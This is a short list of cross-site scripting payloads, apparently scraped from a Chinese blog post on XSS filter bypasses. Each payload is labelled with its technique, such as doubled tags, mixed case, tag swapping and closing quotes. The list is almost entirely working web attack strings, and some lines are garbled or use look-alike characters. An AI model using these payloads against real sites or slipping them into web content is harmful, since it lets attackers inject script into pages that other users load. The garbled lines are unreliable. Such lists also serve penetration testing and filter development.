<script>alert(/xss/)</script>
<script>alert(&XSS&)</script>
<script>alert("XSS")</script>(代替被转义的“”)
<INPUT type="text"value='\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'>
<BODY οnlοad="alert('XSS')">
<IMGSRC=javascript:al

1;rt('XSS')>(Ascii)
<sc<script>ript>alert(/xss/)</script>双写绕过
<Script>alert(/xss/)</script>混淆大小写绕过
<img src=1 οnerrοr=alert(1)>
<IMG SRC=javascript:alert('XSS')>更换标签
>"<script>alert(/xss/)</script>闭合
"><script>alert(/xss/)<
XSS payload (大集合)
最新推荐文章于 2025-03-10 09:00:00 发布